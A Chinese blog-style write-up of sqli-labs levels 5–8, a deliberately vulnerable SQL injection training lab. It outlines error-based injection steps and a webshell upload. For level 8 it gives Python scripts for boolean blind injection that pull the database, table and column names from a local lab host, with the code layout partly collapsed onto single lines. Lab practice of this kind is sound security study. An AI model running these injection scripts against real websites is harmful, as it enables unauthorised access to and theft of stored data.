sqli-libs学习记录(5-8)

2024-01-19 15:18
文章标签 学习 记录 sqli libs

本文主要是介绍sqli-libs学习记录(5-8),希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

文章目录

  • 第五关
  • 第六关
  • 第七关
  • 第八关

第五关

首先猜出闭合规则''
通过order by得到列数为3
在这里插入图片描述
通过报错注入得到数据库名结果
在这里插入图片描述
得到表
在这里插入图片描述
得到三列名
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
类似这样得到所有密码
在这里插入图片描述

第六关

和第五关差不多,懒得一步一步来
在这里插入图片描述

第七关

上传一句话木马用蚁剑
在这里插入图片描述

第八关

首先上面报错都不能用了,老老实实写脚本吧,因为知道结构所以就当体验一把了

import requestsurl = "http://192.168.1.105/Less-8/?id=1'"for i in range(0, 15):temp = url + f"and length(database())={i} --+"r = requests.get(temp)if "You are in" in r.text:print('当前数据库长度:', i)break

得到数据库长度为8

result = ''
for i in range(1, 9):for number in range(97, 127):temp = url + f"and ord(substr(database(),{i}))={number} --+ "r = requests.get(temp)if "You are in" in r.text:print(f"第{i}个字母为{chr(number)}")result += chr(number);
print("数据库名为:"+result)

得到数据库名为:security

result = ''
for i in range(1, 6):for number in range(97, 127):temp = url + f"and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1),{i}))={number} --+"r = requests.get(temp)if "You are in" in r.text:print(f"第四张表的第{i}个字母为{chr(number)}")result += chr(number)
print("第四张表表名为:"+result)

得到第四张表的表名为users

result = ''
for i in range(1, 3):for number in range(97, 127):temp = url + f"and ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 0,1),{i}))={number} --+"r = requests.get(temp)if "You are in" in r.text:print(f"users表的第一列的第{i}个字母为{chr(number)}")result += chr(number)
print("users表的第一列的列名为:" + result)

得到users表的第一列的列名为:id

之后不再测试了太浪费时间了hhh

这篇关于sqli-libs学习记录(5-8)的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/622822

相关文章

Unity新手入门学习殿堂级知识详细讲解(图文)

《Unity新手入门学习殿堂级知识详细讲解(图文)》Unity是一款跨平台游戏引擎,支持2D/3D及VR/AR开发,核心功能模块包括图形、音频、物理等,通过可视化编辑器与脚本扩展实现开发,项目结构含A... 目录入门概述什么是 UnityUnity引擎基础认知编辑器核心操作Unity 编辑器项目模式分类工程

Python学习笔记之getattr和hasattr用法示例详解

《Python学习笔记之getattr和hasattr用法示例详解》在Python中,hasattr()、getattr()和setattr()是一组内置函数,用于对对象的属性进行操作和查询,这篇文章... 目录1.getattr用法详解1.1 基本作用1.2 示例1.3 原理2.hasattr用法详解2.

基于Spring Boot 的小区人脸识别与出入记录管理系统功能

《基于SpringBoot的小区人脸识别与出入记录管理系统功能》文章介绍基于SpringBoot框架与百度AI人脸识别API的小区出入管理系统,实现自动识别、记录及查询功能,涵盖技术选型、数据模型... 目录系统功能概述技术栈选择核心依赖配置数据模型设计出入记录实体类出入记录查询表单出入记录 VO 类(用于

java中pdf模版填充表单踩坑实战记录(itextPdf、openPdf、pdfbox)

《java中pdf模版填充表单踩坑实战记录(itextPdf、openPdf、pdfbox)》:本文主要介绍java中pdf模版填充表单踩坑的相关资料,OpenPDF、iText、PDFBox是三... 目录准备Pdf模版方法1:itextpdf7填充表单(1)加入依赖(2)代码(3)遇到的问题方法2:pd

Zabbix在MySQL性能监控方面的运用及最佳实践记录

《Zabbix在MySQL性能监控方面的运用及最佳实践记录》Zabbix通过自定义脚本和内置模板监控MySQL核心指标(连接、查询、资源、复制),支持自动发现多实例及告警通知,结合可视化仪表盘,可有效... 目录一、核心监控指标及配置1. 关键监控指标示例2. 配置方法二、自动发现与多实例管理1. 实践步骤

在Spring Boot中集成RabbitMQ的实战记录

《在SpringBoot中集成RabbitMQ的实战记录》本文介绍SpringBoot集成RabbitMQ的步骤,涵盖配置连接、消息发送与接收,并对比两种定义Exchange与队列的方式:手动声明(... 目录前言准备工作1. 安装 RabbitMQ2. 消息发送者(Producer)配置1. 创建 Spr

k8s上运行的mysql、mariadb数据库的备份记录(支持x86和arm两种架构)

《k8s上运行的mysql、mariadb数据库的备份记录(支持x86和arm两种架构)》本文记录在K8s上运行的MySQL/MariaDB备份方案,通过工具容器执行mysqldump,结合定时任务实... 目录前言一、获取需要备份的数据库的信息二、备份步骤1.准备工作(X86)1.准备工作(arm)2.手

SpringBoot3应用中集成和使用Spring Retry的实践记录

《SpringBoot3应用中集成和使用SpringRetry的实践记录》SpringRetry为SpringBoot3提供重试机制,支持注解和编程式两种方式,可配置重试策略与监听器,适用于临时性故... 目录1. 简介2. 环境准备3. 使用方式3.1 注解方式 基础使用自定义重试策略失败恢复机制注意事项

Python UV安装、升级、卸载详细步骤记录

《PythonUV安装、升级、卸载详细步骤记录》:本文主要介绍PythonUV安装、升级、卸载的详细步骤,uv是Astral推出的下一代Python包与项目管理器,主打单一可执行文件、极致性能... 目录安装检查升级设置自动补全卸载UV 命令总结 官方文档详见:https://docs.astral.sh/

统一返回JsonResult踩坑的记录

《统一返回JsonResult踩坑的记录》:本文主要介绍统一返回JsonResult踩坑的记录,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录统一返回jsonResult踩坑定义了一个统一返回类在使用时,JsonResult没有get/set方法时响应总结统一返回